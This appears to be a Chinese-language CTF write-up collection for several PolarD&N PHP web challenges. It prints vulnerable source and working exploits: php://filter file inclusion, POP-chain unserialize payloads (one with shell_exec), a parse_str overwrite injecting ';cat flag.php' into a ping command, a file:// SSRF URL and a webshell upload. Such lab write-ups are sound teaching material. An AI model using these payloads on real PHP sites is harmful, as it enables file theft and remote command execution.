phar:
<?php
include 'funs.php';
highlight_file(__FILE__);
if (isset($_GET['file'])) {
if (myWaf($_GET['file'])) {
include($_GET['file']);
} else {
unserialize($_GET['data']);
}
}
发现文件包含漏洞:payload:/?file=php://filter/convert.base64-encode/resource=funs.php
base64解密:
<?php
include 'f1@g.php';
function myWaf($data)
{
if (preg_match("/f1@g/i", $data)) {
echo "NONONONON0!";
return FALSE;
} else {
return TRUE;
}
}
class A
{
private $a;
public function __destruct()
{
echo "A->" . $this->a . "destruct!";
}
}
class B
{
private $b = array();
public function __toString()
{
$str_array= $this->b;
$str2 = $str_array['kfc']->vm50;
return "Crazy Thursday".$str2;
}
}
class C{
private $c = array();
public function __get($kfc){
global $flag;
$f = $this->c[$kfc];
var_dump($$f);
}
}
发现反序列化漏洞:构造pop链
A::_destruct->B::_tostring->_get
<?php
class A
{
public $a;
public function __construct()
{
$this->a=new B();//触发_tostring
}
}
class B
{
public $b = array();
public function __construct()
{
$this->b=array("kfc"=>new C());//触发_get
}
}
class C{
public $c = array();
public function __construct()
{
$this->c=array("vm50"=>"flag");//变量覆盖flag
}
}
$A=new A();
echo urlencode(serialize($A));
最终payload:/?file=f1@g&data=O%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3Ba%3A1%3A%7Bs%3A3%3A%22kfc%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Ba%3A1%3A%7Bs%3A4%3A%22vm50%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D
覆盖:
<?php
error_reporting(0);
if (empty($_GET['id'])) {
show_source(__FILE__);
die();
} else {
include 'flag.php';
$a = "www.baidu.com";
$result = "";
$id = $_GET['id'];
@parse_str($id);//变量覆盖函数
echo $a[0];
if ($a[0] == 'www.polarctf.com') {
$ip = $_GET['cmd'];
$result .= shell_exec('ping -c 2 ' . $a[0] . $ip);
if ($result) {
echo "<pre>{$result}</pre>";
}
} else {
exit('其实很简单!');
}
}
通过代码审计可知需要a[0]=www.polatctf.com才可以命令执行
payload:?id=a[0]=www.polarctf.com&cmd=;cat flag.php
flag在源码
csdn:
进入页面发现url有猫腻猜测是ssrf漏洞
查看源码有提示
payload:file://flag/flag.txt
PlayGme:
<?php
/*
PolarD&N CTF
*/
class User{
public $name;
public $age;
public $sex;
public function __toString()
{
return "name:".$this->name."age:".$this->age."sex:".$this->sex;
}
public function setName($name){
$this->name=$name;
}
public function setAge($age){
$this->$age=$age;
}
public function setSex($sex){
$this->$sex=$sex;
}
}
class PlayGame{
public $user;
public $gameFile="./game";
public function openGame(){
return file_get_contents($this->gameFile);
}
public function __destruct()
{
echo $this->user->name."GameOver!";
}
public function __toString(){
return $this->user->name."PlayGame ". $this->user->age . $this->openGame();
}
}
if(isset($_GET['polar_flag.flag'])){//传入参数有下划线需要用[去绕过
unserialize($_GET['polar_flag.flag']);
}else{
highlight_file(__FILE__);
}
PlayGame::-destruct->user->User->name->Playgame->openGame
pop:
<?php
class User{
public $name;
public $age;
public $sex;
public function __toString()
{
return "name:".$this->name."age:".$this->age."sex:".$this->sex;
}
public function setName($name){
$this->name=$name;
}
public function setAge($age){
$this->$age=$age;
}
public function setSex($sex){
$this->$sex=$sex;
}
}
class PlayGame{
public $user;
public $gameFile="/flag";
public function openGame(){
return file_get_contents($this->gameFile);
}
public function __destruct()
{
echo $this->user->name."GameOver!";
}
public function __toString(){
return $this->user->name."PlayGame ". $this->user->age . $this->openGame();
}
}
$A=new PlayGame();
$B=new User();
$C=new PlayGame();
$A->user=$B;
$B->name=$C;
echo serialize($A)
?>
flag在源码
flie
页面提示用dirseach扫描
发现有upload.php uploaded
一个是上传页面 一个是路径
直接getshell
uploader:
自己写一个上传表单
<html>
<head>
<meta charset="utf-8">
<title>上传文件</title>
</head>
<body>
<form action="你的url" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
路径+文件名访问即可
PHP反序列化初试
//pop:
<?php
class Easy{
public $name;
public function __wakeup()
{
echo $this->name;
}
}
class Evil{
public $evil;
private $env;
public function __toString()
{
$this->env=shell_exec($this->evil);
return $this->env;
}
}
$A=new Easy();
$B=new Evil();
$A->name=$B;
$B->evil="cat f1@g.php";
echo urlencode(serialize($A))
?>
机器人
用dirseach扫描即可
PHP_Deserialization
<?php
class Polar
{
public $night;
public $night_arg;
public function __wakeup()
{
echo "hacker";
$this->night->hacker($this->night_arg);
}
}
class Night
{
public function __call($name, $arguments)
{
echo "wrong call:" . $name . " arg:" . $arguments[0];
}
}
class Day
{
public $filename="/flflagag";//双写绕过
}
$A=new Polar();
$B=new Night();
$C=new Day();
$A->night=$B;
$A->night_arg=$C;
echo base64_encode(serialize($A));
?>
苦海:
<?php
class User
{
public $name ;
public $flag;
public function __construct()
{
echo "删库跑路,蹲监狱~";
}
public function printName()
{
echo $this->name;
return 'ok';
}
public function __wakeup()
{
echo "hi, Welcome to Polar D&N ~ ";
$this->printName();
}
public function __get($cc)
{
echo "give you flag : " . $this->flag;
}
}
class Surrender
{
private $phone = 110;
public $promise = '遵纪守法,好公民~';
public function __construct()
{
$this->promise = '苦海无涯,回头是岸!';
return $this->promise;
}
public function __toString()
{
return $this->file['filename']->content['title'];
}
}
class FileRobot
{
public $filename = '../flag.php';
public $path;
public function __get($name)
{
$function = $this->path;
return $function();
}
public function Get_file($file)
{
$hint = base64_encode(file_get_contents($file));
echo $hint;
}
public function __invoke()
{
$content = $this->Get_file($this->filename);
echo $content;
}
}
$A=new User();
$B=new Surrender();
$C=new FileRobot();
$D=new FileRobot();
$A->name=$B;
$B->file['filename']=$C;
$C->path=$D;
echo urlencode(serialize($A));
?>
java不会